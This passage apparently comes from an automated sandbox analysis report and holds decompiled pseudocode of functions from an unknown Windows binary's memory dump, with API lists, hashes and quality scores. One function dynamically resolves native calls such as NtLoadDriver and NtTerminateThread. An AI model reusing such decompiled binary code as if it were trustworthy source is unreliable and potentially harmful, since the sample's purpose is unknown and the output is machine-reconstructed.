                                                                                                                				intOrPtr _t88;
                                                                                                                				signed short _t93;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t128;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t138;
                                                                                                                				void* _t141;
                                                                                                                				void* _t142;
                                                                                                                				void* _t146;
                                                                                                                
                                                                                                                				_t142 = __eflags;
                                                                                                                				_push(_t102);
                                                                                                                				_t131 = __eax;
                                                                                                                				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                				E00406746(__eax);
                                                                                                                				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                				_t135 = 5;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                				_t124 = 0x14;
                                                                                                                				_t74 = _t135 * _t124;
                                                                                                                				 *(_t131 + 0x2d0) = _t135;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                				L0040B26C();
                                                                                                                				 *(_t131 + 0x2d4) = _t74;
                                                                                                                				_t126 = 0x14;
                                                                                                                				_t76 = _t135 * _t126;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                				L0040B26C();
                                                                                                                				_t95 = 0x40f008;
                                                                                                                				 *(_t131 + 0x40) = _t76;
                                                                                                                				_v8 = 0x40f008;
                                                                                                                				do {
                                                                                                                					_t137 =  *_t95 * 0x14;
                                                                                                                					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                					_t141 = _t141 + 0x18;
                                                                                                                					_v12 = _t85;
                                                                                                                					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                					if((_t85 & 0xffff0000) == 0) {
                                                                                                                						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                						_t95 = _v8;
                                                                                                                						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                					}
                                                                                                                					_t95 = _t95 + 0x28;
                                                                                                                					_t146 = _t95 - 0x40f0d0;
                                                                                                                					_v8 = _t95;
                                                                                                                				} while (_t146 < 0);
                                                                                                                				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                				_t138 = 5;
                                                                                                                				_t128 = 4;
                                                                                                                				_t87 = _t138 * _t128;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                				 *(_t131 + 0x2c) = _t138;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                				L0040B26C();
                                                                                                                				_push(0xc);
                                                                                                                				 *(_t131 + 0x30) = _t87;
                                                                                                                				L0040B26C();
                                                                                                                				_t139 = _t87;
                                                                                                                				if(_t87 == 0) {
                                                                                                                					_t88 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                				return E0040686C(_t131);
                                                                                                                			}


























                                                                                                                0x00406a01
                                                                                                                0x00406a06
                                                                                                                0x00406a08
                                                                                                                0x00406a0b
                                                                                                                0x00406a10
                                                                                                                0x00406a16
                                                                                                                0x00406a25
                                                                                                                0x00406a25
                                                                                                                0x00406a18
                                                                                                                0x00406a1e
                                                                                                                0x00406a1e
                                                                                                                0x00406a27
                                                                                                                0x00406a2f
                                                                                                                0x00406a32
                                                                                                                0x00406a35
                                                                                                                0x00406a3b
                                                                                                                0x00406a41
                                                                                                                0x00406a47
                                                                                                                0x00406a4d
                                                                                                                0x00406a53
                                                                                                                0x00406a5d
                                                                                                                0x00406a6d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* _v20;
                                                                                                                				int _v24;
                                                                                                                				void _v56;
                                                                                                                				char _v584;
                                                                                                                				char _v588;
                                                                                                                				char _v41548;
                                                                                                                				void* __edi;
                                                                                                                				void* _t40;
                                                                                                                				void _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t71;
                                                                                                                				int _t77;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				E0040B550(0xa248, __ecx);
                                                                                                                				_t77 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				E00408E31();
                                                                                                                				_t40 =  *0x41c47c;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                				}
                                                                                                                				if(_v8 == _t77) {
                                                                                                                					_v8 = 0x186a0;
                                                                                                                				}
                                                                                                                				_v8 = _v8 + 0x3e80;
                                                                                                                				_push(_v8);
                                                                                                                				L0040B26C();
                                                                                                                				_t81 = _t40;
                                                                                                                				_v20 = _t81;
                                                                                                                				memset(_t81, _t77, _v8);
                                                                                                                				_t83 = _t82 + 0x10;
                                                                                                                				_v24 = _t77;
                                                                                                                				E00408E31();
                                                                                                                				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                				L5:
                                                                                                                				while(1) {
                                                                                                                					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                						L16:
                                                                                                                						_t46 =  *_t81;
                                                                                                                						_t77 = 0;
                                                                                                                						if(_t46 == 0) {
                                                                                                                							_push(_v20);
                                                                                                                							L0040B272();
                                                                                                                							return _t46;
                                                                                                                						}
                                                                                                                						_t81 = _t81 + _t46;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t47 = _a4;
                                                                                                                					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                					_v12 = _t77;
                                                                                                                					_v16 = _t71;
                                                                                                                					if(_t71 <= _t77) {
                                                                                                                						L10:
                                                                                                                						_t66 = 0;
                                                                                                                						L11:
                                                                                                                						if(_t66 == 0) {
                                                                                                                							E004090AF( &_v588);
                                                                                                                							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                							_t32 = _t81 + 0x20; // 0x20
                                                                                                                							memcpy( &_v56, _t32, 8);
                                                                                                                							_t83 = _t83 + 0x10;
                                                                                                                							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                						} else {
                                                                                                                							_t26 = _t66 + 4; // 0x4
                                                                                                                							_t72 = _t26;
                                                                                                                							if( *_t26 == 0) {
                                                                                                                								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                								_t28 = _t81 + 0x20; // 0x20
                                                                                                                								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                								_t83 = _t83 + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                					_t80 = _t47 + 0x28;
                                                                                                                					while(1) {
                                                                                                                						_t64 = E00405A92(_v12, _t80);
                                                                                                                						if( *_t64 == _t67) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						if(_v12 < _v16) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t66 = _t64;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t9;
                                                                                                                				void** _t11;
                                                                                                                				char** _t15;
                                                                                                                				char** _t24;
                                                                                                                				void* _t25;
                                                                                                                				char* _t28;
                                                                                                                				char* _t29;
                                                                                                                				char* _t30;
                                                                                                                				char* _t31;
                                                                                                                				char** _t33;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				 *__edi = "cf@";
                                                                                                                				_t9 = E00406746(__edi);
                                                                                                                				_t28 = __edi[5];
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t28);
                                                                                                                					_push(_t28);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t29 = _t24[4];
                                                                                                                				if(_t29 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t29);
                                                                                                                					_push(_t29);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t30 = _t24[3];
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t30);
                                                                                                                					_push(_t30);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t31 = _t24[2];
                                                                                                                				if(_t31 != 0) {
                                                                                                                					E004055D1(_t9, _t31);
                                                                                                                					_push(_t31);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t15 = _t24;
                                                                                                                				_pop(_t32);
                                                                                                                				_push(_t24);
                                                                                                                				_t33 = _t15;
                                                                                                                				_t25 = 0;
                                                                                                                				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                						_t25 = _t25 + 1;
                                                                                                                					} while (_t25 < _t33[0xd]);
                                                                                                                				}
                                                                                                                				_t11 =  *( *_t33)();
                                                                                                                				free( *_t11);
                                                                                                                				return _t11;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				int _t27;
                                                                                                                				struct HWND__* _t30;
                                                                                                                				struct HWND__* _t32;
                                                                                                                
                                                                                                                				_t30 = _a4;
                                                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                                                					_t32 = GetParent(_t30);
                                                                                                                					GetWindowRect(_t30,  &_v20);
                                                                                                                					GetClientRect(_t32,  &_v36);
                                                                                                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                					_v20.x = _t27;
                                                                                                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                				}
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					E00404FBB(_t30);
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t20 = __eax;
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_t28 = __eax - 1;
                                                                                                                				L0040B26C();
                                                                                                                				_v16 = __eax;
                                                                                                                				if(_t28 > 0) {
                                                                                                                					_t21 = _a4;
                                                                                                                					_v8 = __ebx;
                                                                                                                					_v8 =  ~_v8;
                                                                                                                					_t32 = _t28 * __ebx + _t21;
                                                                                                                					_a4 = _t21;
                                                                                                                					do {
                                                                                                                						memcpy(_v16, _a4, __ebx);
                                                                                                                						memcpy(_a4, _t32, __ebx);
                                                                                                                						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                						_a4 = _a4 + __ebx;
                                                                                                                						_t32 = _t32 + _v8;
                                                                                                                						_t34 = _t34 + 0x24;
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						_t28 = _t28 - 1;
                                                                                                                					} while (_t28 > _v12);
                                                                                                                				}
                                                                                                                				_push(_v16);
                                                                                                                				L0040B272();
                                                                                                                				return _t20;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __esi;
                                                                                                                				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                				if(_t9 != 0) {
                                                                                                                					_push(_t9);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                				if(_t10 != 0) {
                                                                                                                					_push(_t10);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_push(_t11);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t11 =  *_t18;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_push(_t11);
                                                                                                                						L0040B272();
                                                                                                                						 *_t18 = 0;
                                                                                                                					}
                                                                                                                					_push(_t18);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t42;
                                                                                                                				RECT* _t44;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t42 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t37 = _a12;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(__ecx + 0x378);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(3);
                                                                                                                					_t44 = _t42 + 0x378;
                                                                                                                					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                					_t42 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
